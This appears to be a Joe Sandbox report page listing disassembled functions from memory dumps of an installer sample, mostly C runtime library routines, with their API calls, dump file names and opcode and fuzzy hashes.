Source File: 00000000.00000002.3872627570.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5fa0000_998_popxinv_Installer.jbxd

Similarity

API ID: GlobalMemoryStatus
String ID:
API String ID: 1890195054-0
Opcode ID: 112dd46c00b86949d209fbb22859ae103f3c64e53bce439347e2cacfcb6bc09f
Instruction ID: be9c0457856fb3c0cd0da53f46c92df9c05da1ffc00562b6f4c15b16acf06bc6
Opcode Fuzzy Hash: 112dd46c00b86949d209fbb22859ae103f3c64e53bce439347e2cacfcb6bc09f
Instruction Fuzzy Hash: 131117B2C056599BDB10DFAAC444BDEFBF4EF48214F14816AE828B7240D378A940CFE5

Function 00A12480 Relevance: 1.5, APIs: 1, Instructions: 37COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00A12485

Part of subcall function 00A1130B: std::locale::facet::_Incref.LIBCPMT ref: 00A1131E

Part of subcall function 00A1235C: __EH_prolog.LIBCMT ref: 00A12361
Part of subcall function 00A1235C: std::_Lockit::_Lockit.LIBCPMT ref: 00A12370
Part of subcall function 00A1235C: int.LIBCPMT ref: 00A12387

Memory Dump Source

Source File: 00000000.00000002.3869230113.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.3869188726.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3869251590.0000000000A29000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3869267585.0000000000A2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3869284652.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_998_popxinv_Installer.jbxd

Similarity

API ID: H_prolog$IncrefLockitLockit::_std::_std::locale::facet::_
String ID:
API String ID: 3551698239-0
Opcode ID: a0b7de5d2472361333bac47e0e482ee0b0649713959123b915680f8e3809cf89
Instruction ID: fcd982c0f7688cfbada87cab5988feb68ec24128c83de22b0df83174fc7f66df
Opcode Fuzzy Hash: a0b7de5d2472361333bac47e0e482ee0b0649713959123b915680f8e3809cf89
Instruction Fuzzy Hash: 86F09032A00118AFCF15EF54CE01BEE73A9AB18B01F004429F516D6582DBB8CAE0C794

Function 00A12485 Relevance: 1.5, APIs: 1, Instructions: 37COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00A12485

Part of subcall function 00A1130B: std::locale::facet::_Incref.LIBCPMT ref: 00A1131E

Part of subcall function 00A1235C: __EH_prolog.LIBCMT ref: 00A12361
Part of subcall function 00A1235C: std::_Lockit::_Lockit.LIBCPMT ref: 00A12370
Part of subcall function 00A1235C: int.LIBCPMT ref: 00A12387

Memory Dump Source

Source File: 00000000.00000002.3869230113.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.3869188726.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3869251590.0000000000A29000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3869267585.0000000000A2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3869284652.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_998_popxinv_Installer.jbxd

Similarity

API ID: H_prolog$IncrefLockitLockit::_std::_std::locale::facet::_
String ID:
API String ID: 3551698239-0
Opcode ID: 79eaa7a5f92dd91f6327d5e40c0eb93298e14f644992e287d1ab6ce0112a2472
Instruction ID: 8dcaa0b164db1ede259d345ab66cc2c679d6ab6d4af8c79fd79d1e15c96177d6
Opcode Fuzzy Hash: 79eaa7a5f92dd91f6327d5e40c0eb93298e14f644992e287d1ab6ce0112a2472
Instruction Fuzzy Hash: 80F0B432A10158AFCF15EF64CE01BEE73A9AB18701F004429F916D6581DBB4CAE0C784

Function 03B2D5FC Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3870739802.0000000003B2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 03B2D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b2d000_998_popxinv_Installer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0ecfc957c12b731caeb5daaa8490c92b866e85d6e75fea6350c32ba45c225943
Instruction ID: 6312484f2cce51f2ae84fdc9da788473b25c729dfcf7f7a39d7f14e88cee650c
Opcode Fuzzy Hash: 0ecfc957c12b731caeb5daaa8490c92b866e85d6e75fea6350c32ba45c225943
Instruction Fuzzy Hash: 2F210371604244DFDB06EF50D9C4B26BFA5FB88318F2486BDE81D4B256C336D456CAA2

Function 03B2D5F7 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3870739802.0000000003B2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 03B2D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b2d000_998_popxinv_Installer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 061b43f9f55bc8c590b9c9c46c782dfd97981b19fafe3d8fadcc20d7327e92d2
Instruction ID: 88317b74a2f637bbd282523fb0b2fb340f53fa93ef4b7db45f1c3bfdb19106e0
Opcode Fuzzy Hash: 061b43f9f55bc8c590b9c9c46c782dfd97981b19fafe3d8fadcc20d7327e92d2
Instruction Fuzzy Hash: CB11AF76504244CFCB06DF10D5C4B16BF62FB84318F28C6EDD8490B656C336D45ACBA1

Function 03B2D006 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3870739802.0000000003B2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 03B2D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b2d000_998_popxinv_Installer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e55426785160cc9deb1ccf35fcab1f039234302413d9d20ce5485a3c4bc39d05
Instruction ID: e996d937794766acf471e4cc30383c86569d335c73ad623363f99a66ce9de08f
Opcode Fuzzy Hash: e55426785160cc9deb1ccf35fcab1f039234302413d9d20ce5485a3c4bc39d05
Instruction Fuzzy Hash: 22015E7140D3D09FE7168B258C94752BFA8DF53228F1D85DBE8988F1A3C2695C45CBB2

Function 03B2D01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3870739802.0000000003B2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 03B2D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b2d000_998_popxinv_Installer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1fa6416d16d147a9c0b9f7386889ab47bde89432150678d8dbcd7fafd96cae98
Instruction ID: 63f594f54f18719581405ed4fb81f60689ee1821f1ff3686a92c483d8995a714
Opcode Fuzzy Hash: 1fa6416d16d147a9c0b9f7386889ab47bde89432150678d8dbcd7fafd96cae98
Instruction Fuzzy Hash: 0801A771508350ABE7208F25C884767FFD8DF45628F18C6AEDD6C4E152C7799841C6B2

Non-executed Functions

Function 00A1F4CD Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 54COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,00000000,00000002,?,?,00A1FB0A,?,00A16AFC,?,000000BC,?,00000001,00000000,00000000), ref: 00A1F50C
GetLocaleInfoW.KERNEL32(?,20001004,00000000,00000002,?,?,00A1FB0A,?,00A16AFC,?,000000BC,?,00000001,00000000,00000000), ref: 00A1F535
GetACP.KERNEL32(?,?,00A1FB0A,?,00A16AFC,?,000000BC,?,00000001,00000000), ref: 00A1F549

Strings

OCP, xrefs: 00A1F4ED
ACP, xrefs: 00A1F4DC

Memory Dump Source

Source File: 00000000.00000002.3869230113.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.3869188726.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3869251590.0000000000A29000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3869267585.0000000000A2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3869284652.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_998_popxinv_Installer.jbxd

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 4291571c344a28f2c19b18e4d2ba43e9a214238dcc011f5d45f07b6110d8bd94
Instruction ID: 1132bb11015e88f0a96b2a7ce1f24dfdfa73459bfb39c4768f02cbfa06bdfd0d
Opcode Fuzzy Hash: 4291571c344a28f2c19b18e4d2ba43e9a214238dcc011f5d45f07b6110d8bd94
Instruction Fuzzy Hash: AC018F31605247BEEF21DF69BD0ABEE77AAAF01768F204534F401E1481EB60DA829665

Function 00A165D1 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 00A1E003
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00A1E018
UnhandledExceptionFilter.KERNEL32(00A2AEF0), ref: 00A1E023
GetCurrentProcess.KERNEL32(C0000409), ref: 00A1E03F
TerminateProcess.KERNEL32(00000000), ref: 00A1E046

Memory Dump Source

Source File: 00000000.00000002.3869230113.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.3869188726.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3869251590.0000000000A29000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3869267585.0000000000A2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3869284652.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_998_popxinv_Installer.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 6a841d2a5fbc0f775538847d10889583362bd2e22e513505f4e0218f0886a0e3
Instruction ID: ee57e67f62a1597839d9fc31c9d32695e8ed9b924051bd698ef386d1d63310af
Opcode Fuzzy Hash: 6a841d2a5fbc0f775538847d10889583362bd2e22e513505f4e0218f0886a0e3
Instruction Fuzzy Hash: 5E21CCB98013049FC790DFE9FD84AA43BF5FB08B50F10546AF8098BA60E7B059838F55

Function 00A1C78D Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_0000C74B), ref: 00A1C792

Memory Dump Source

Source File: 00000000.00000002.3869230113.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.3869188726.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3869251590.0000000000A29000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3869267585.0000000000A2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3869284652.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_998_popxinv_Installer.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: ab6ee427a9977ee1ff179c02c03fb64edeb54ea694abbcf0ee4133dc1fbf2272
Instruction ID: 7a8cfadeb7345018a08121f46e8008357b5b34928429cbdb8f96e696a933995c
Opcode Fuzzy Hash: ab6ee427a9977ee1ff179c02c03fb64edeb54ea694abbcf0ee4133dc1fbf2272
Instruction Fuzzy Hash: 7A9002B029550456871157B85D1A96635926A68A12B4208606105C4498DBD045425952

Function 05FA49C0 Relevance: 1.5, Strings: 1, Instructions: 238COMMON

Download Yara Rule

Strings

\VGm, xrefs: 05FA4C0B

Memory Dump Source

Source File: 00000000.00000002.3872627570.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5fa0000_998_popxinv_Installer.jbxd

Similarity

API ID:
String ID: \VGm
API String ID: 0-1150679331
Opcode ID: 8cd77398b21f895c594110d1a5e776fd8df2858d60159765598558fa9b16d6cb
Instruction ID: 1af2cdbfe7b9e196973b8aba23ea24aa3002c51e3a0f85d1d23359d182cdd1a0
Opcode Fuzzy Hash: 8cd77398b21f895c594110d1a5e776fd8df2858d60159765598558fa9b16d6cb
Instruction Fuzzy Hash: 3B917EB1E00309DFDF14DFA9C88979DBBF2BF88354F148129D419A7254EBB99841CB86

Function 00A20BD6 Relevance: .4, Instructions: 355COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3869230113.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.3869188726.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3869251590.0000000000A29000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3869267585.0000000000A2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3869284652.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_998_popxinv_Installer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
Instruction ID: 9acfdfdc2ed837867c356d6af57125e59180f057c3d10ef7d7bbffa0ad348c9e
Opcode Fuzzy Hash: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
Instruction Fuzzy Hash: EFC18D73D0F5F2498B36422E2418A3BEE626E91B8531FC3B1DCD43F59AC227AD0196D0

Function 00A207EE Relevance: .3, Instructions: 349COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3869230113.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.3869188726.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3869251590.0000000000A29000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3869267585.0000000000A2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3869284652.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_998_popxinv_Installer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
Instruction ID: ddb928264ccf9dbd87eb6d4ccd277be4ad07c2f025d0a21584d9b74cbc8522d1
Opcode Fuzzy Hash: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
Instruction Fuzzy Hash: 23C17C73D0E5F2499B36472D2418A3BEEA26E91B8531BC3B1DCD43F59BC227AD0196D0

Function 00A2041C Relevance: .3, Instructions: 332COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3869230113.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.3869188726.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3869251590.0000000000A29000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3869267585.0000000000A2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3869284652.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_998_popxinv_Installer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
Instruction ID: 779758ea0ba55226f499f6e2f9e8e13d43849d626d665937d94a7cb64c7a48d6
Opcode Fuzzy Hash: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
Instruction Fuzzy Hash: 65C19F73D0E9F2498B36472D2418A3FEE626E81B8531BC3B1DCD43F59AC227AD0195D0

Function 00A2007E Relevance: .3, Instructions: 326COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3869230113.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.3869188726.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3869251590.0000000000A29000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3869267585.0000000000A2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3869284652.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_998_popxinv_Installer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21b74c51e355f1ada917146b454bba93dbff062365e48e41ecc74cc68dac6f4d
Instruction ID: c8c9495986548b044111ea9c09747cd6ac1c296ca6982b47b3189fdaad8ef6c0
Opcode Fuzzy Hash: 21b74c51e355f1ada917146b454bba93dbff062365e48e41ecc74cc68dac6f4d
Instruction Fuzzy Hash: 14B18F33D0E5F24A8775822D2458A3FEE626E91B8531AC3B1CCD43F59AC627AD0196D0

Function 05FA07A0 Relevance: .3, Instructions: 260COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3872627570.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5fa0000_998_popxinv_Installer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eb582e00159cc6ff6bdebf46900c32333695db5e2bd2f7d1cac9693d192626a4
Instruction ID: 4667edd7e8f798eb732690f4310711740c4171525337a786572cf6b05f87ec62
Opcode Fuzzy Hash: eb582e00159cc6ff6bdebf46900c32333695db5e2bd2f7d1cac9693d192626a4
Instruction Fuzzy Hash: 5381B175F01618CBDB18EF75945877E77BBBFC8600B05846DD407E7288CE3998029B92

Function 03AE1628 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3870470602.0000000003AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3ad0000_998_popxinv_Installer.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 54093e43b9854a2d540d9dde3269946287902615532eb97d05431949d4969fe2
Instruction ID: 458cd6654a66325b6483962818556fbac374e800a224833377cac196b5c4551b
Opcode Fuzzy Hash: 54093e43b9854a2d540d9dde3269946287902615532eb97d05431949d4969fe2
Instruction Fuzzy Hash: 70F03932200215AFCF15DF49C841DAA77E9EF08220B48406AFD09DB221E231ED209B80

Function 00A11671 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3869230113.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.3869188726.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3869251590.0000000000A29000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3869267585.0000000000A2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3869284652.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_998_popxinv_Installer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e9b762c1d9091a2c99a71b58989111832db4a596a20ce5d8aa31cc9ae1b6fce7
Instruction ID: b7981b2b79c9869a23804c67e8d6833124cc0914444bbad9644d1b21342d72dc
Opcode Fuzzy Hash: e9b762c1d9091a2c99a71b58989111832db4a596a20ce5d8aa31cc9ae1b6fce7
Instruction Fuzzy Hash: 71C012B1C04318AB8F04EFED544109DBBF8AA04200B40C5AA9405B2242D27052104644

Function 00A198E5 Relevance: 40.4, APIs: 18, Strings: 5, Instructions: 109libraryloadermemoryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,00A15A5E), ref: 00A198ED
__mtterm.LIBCMT ref: 00A198F9

Part of subcall function 00A19632: DecodePointer.KERNEL32(00000002,00A19A5B,?,00A15A5E), ref: 00A19643
Part of subcall function 00A19632: TlsFree.KERNEL32(00000002,00A19A5B,?,00A15A5E), ref: 00A1965D
Part of subcall function 00A19632: DeleteCriticalSection.KERNEL32(00000000,00000000,77455810,?,00A19A5B,?,00A15A5E), ref: 00A1B6A4
Part of subcall function 00A19632: _free.LIBCMT ref: 00A1B6A7
Part of subcall function 00A19632: DeleteCriticalSection.KERNEL32(00000002,77455810,?,00A19A5B,?,00A15A5E), ref: 00A1B6CE

GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00A1990F
GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00A1991C
GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00A19929
GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00A19936
TlsAlloc.KERNEL32(?,00A15A5E), ref: 00A19986
TlsSetValue.KERNEL32(00000000,?,00A15A5E), ref: 00A199A1
__init_pointers.LIBCMT ref: 00A199AB
EncodePointer.KERNEL32(?,00A15A5E), ref: 00A199BC
EncodePointer.KERNEL32(?,00A15A5E), ref: 00A199C9
EncodePointer.KERNEL32(?,00A15A5E), ref: 00A199D6
EncodePointer.KERNEL32(?,00A15A5E), ref: 00A199E3
DecodePointer.KERNEL32(00A197B6,?,00A15A5E), ref: 00A19A04
__calloc_crt.LIBCMT ref: 00A19A19
DecodePointer.KERNEL32(00000000,?,00A15A5E), ref: 00A19A33
GetCurrentThreadId.KERNEL32 ref: 00A19A45

Strings

FlsGetValue, xrefs: 00A19911
FlsSetValue, xrefs: 00A1991E
KERNEL32.DLL, xrefs: 00A198E8
FlsAlloc, xrefs: 00A19909
FlsFree, xrefs: 00A1992B

Memory Dump Source

Source File: 00000000.00000002.3869230113.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.3869188726.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3869251590.0000000000A29000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3869267585.0000000000A2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3869284652.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_998_popxinv_Installer.jbxd

Similarity

API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
API String ID: 3698121176-3819984048
Opcode ID: 597e25948055fc4c3d1b63df467c74339094b9dc025fbd8e44a4e68d34a3413f
Instruction ID: 1cbc49398ea1459ad5f417d35b0822a34b9379309bc7095bf9468e57806d1dc9
Opcode Fuzzy Hash: 597e25948055fc4c3d1b63df467c74339094b9dc025fbd8e44a4e68d34a3413f
Instruction Fuzzy Hash: 3B315D719053549FF730DFF9AD2AFAB3AA4AB447A0B05052AF518961B1DB348883CF50

Function 00A1235C Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00A12361
std::_Lockit::_Lockit.LIBCPMT ref: 00A12370
int.LIBCPMT ref: 00A12387

Part of subcall function 00A11035: std::_Lockit::_Lockit.LIBCPMT ref: 00A11046

std::bad_exception::bad_exception.LIBCMT ref: 00A123BE
__CxxThrowException@8.LIBCMT ref: 00A123CC
std::locale::facet::_Incref.LIBCPMT ref: 00A123DC
std::locale::facet::_Facet_Register.LIBCPMT ref: 00A123E2

Strings

bad cast, xrefs: 00A123B6

Memory Dump Source

Source File: 00000000.00000002.3869230113.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.3869188726.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3869251590.0000000000A29000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3869267585.0000000000A2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3869284652.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_998_popxinv_Installer.jbxd

Similarity

API ID: LockitLockit::_std::_std::locale::facet::_$Exception@8Facet_H_prologIncrefRegisterThrowstd::bad_exception::bad_exception
String ID: bad cast
API String ID: 878426289-3145022300
Opcode ID: 60c77eeea5938d2d41e97f16a695899746afb2a9f77091372d6fe589487d22bb
Instruction ID: ce8472a4432035067a1bd62e92572feee345081259d2835b40e77a8b5502dd87
Opcode Fuzzy Hash: 60c77eeea5938d2d41e97f16a695899746afb2a9f77091372d6fe589487d22bb
Instruction Fuzzy Hash: 73118E36D00214ABCF05EBA4DE52AEEB775AF84720F140629F521AB2D1DB74DA85CB90

Function 00A11E2B Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00A11E30
std::_Lockit::_Lockit.LIBCPMT ref: 00A11E3F
int.LIBCPMT ref: 00A11E56

Part of subcall function 00A11035: std::_Lockit::_Lockit.LIBCPMT ref: 00A11046

std::bad_exception::bad_exception.LIBCMT ref: 00A11E8D
__CxxThrowException@8.LIBCMT ref: 00A11E9B
std::locale::facet::_Incref.LIBCPMT ref: 00A11EAB
std::locale::facet::_Facet_Register.LIBCPMT ref: 00A11EB1

Strings

bad cast, xrefs: 00A11E85

Memory Dump Source

Source File: 00000000.00000002.3869230113.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.3869188726.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3869251590.0000000000A29000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3869267585.0000000000A2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3869284652.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_998_popxinv_Installer.jbxd

Similarity

API ID: LockitLockit::_std::_std::locale::facet::_$Exception@8Facet_H_prologIncrefRegisterThrowstd::bad_exception::bad_exception
String ID: bad cast
API String ID: 878426289-3145022300
Opcode ID: 8d967345278663712811595f0ba9f6dbcfa7af4dcbb248775aec60350f41220d
Instruction ID: 14a9f62efde6e1b9c08ecf8d7ad3f88d9b0060cf4641401ae64bfa74d3bb7d9e
Opcode Fuzzy Hash: 8d967345278663712811595f0ba9f6dbcfa7af4dcbb248775aec60350f41220d
Instruction Fuzzy Hash: FC11E536D00214ABCF05EBE4DE02AFEB735AF84720F140229F521671D1DF309A85C790

Function 00A17413 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49COMMON

Download Yara Rule

APIs

__getptd_noexit.LIBCMT ref: 00A1741A

Part of subcall function 00A19723: GetLastError.KERNEL32(?,?,00A1A964,00A14478,?,?,00A13C78,?,?,00A1101C), ref: 00A19727
Part of subcall function 00A19723: ___set_flsgetvalue.LIBCMT ref: 00A19735
Part of subcall function 00A19723: __calloc_crt.LIBCMT ref: 00A19749
Part of subcall function 00A19723: DecodePointer.KERNEL32(00000000,?,?,00A1A964,00A14478,?,?,00A13C78,?,?,00A1101C), ref: 00A19763
Part of subcall function 00A19723: GetCurrentThreadId.KERNEL32 ref: 00A19779
Part of subcall function 00A19723: SetLastError.KERNEL32(00000000,?,?,00A1A964,00A14478,?,?,00A13C78,?,?,00A1101C), ref: 00A19791

__calloc_crt.LIBCMT ref: 00A1743C
__get_sys_err_msg.LIBCMT ref: 00A1745A
_strcpy_s.LIBCMT ref: 00A17462
__invoke_watson.LIBCMT ref: 00A17477

Strings

Visual C++ CRT: Not enough memory to complete call to strerror., xrefs: 00A17427, 00A1744A

Memory Dump Source

Source File: 00000000.00000002.3869230113.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.3869188726.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3869251590.0000000000A29000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3869267585.0000000000A2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3869284652.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_998_popxinv_Installer.jbxd

Similarity

